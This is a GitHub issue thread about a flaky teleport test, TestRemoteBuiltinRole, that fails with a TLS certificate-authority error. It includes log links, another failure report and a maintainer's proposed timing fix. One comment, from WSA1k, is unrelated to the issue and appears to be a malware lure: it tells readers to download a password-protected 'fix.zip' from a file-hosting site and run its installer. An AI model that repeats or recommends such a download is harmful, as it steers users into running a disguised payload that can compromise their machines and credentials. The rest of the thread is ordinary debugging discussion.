### ISSUE TITLE
`TestRemoteBuiltinRole` flakiness

### ISSUE THREAD

**Issue by ravicious** [gravitational/teleport#45833]
#### Link(s) to logs

- https://github.com/gravitational/teleport/actions/runs/10561009860/job/29255775605#step:6:1618

#### Relevant snippet

```
    tls_test.go:178: 
        	Error Trace:	/__w/teleport/teleport/lib/auth/tls_test.go:178
        	Error:      	Received unexpected error:
        	            	connection error: desc = "error reading server preface: remote error: tls: unknown certificate authority"
        	Test:       	TestRemoteBuiltinRole
```

I don't know who to assign, it looks like the test has not been touched in quite some time.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nklaassen** [comment]
another hit https://github.com/gravitational/teleport/actions/runs/10705690247/job/29681668501?pr=45876

**Comment by espadolini** [comment]
Might be because of the changes to support reloadless (as it doesn't seem to be happening in branch/v16 but it's easily replicable in master by just trying a bit), I'll get a fix out and I'll investigate if it's actually a regression or just a side effect of how the test is written (the fix is to just sleep a bit and try connecting again, probably to wait for cache propagation).
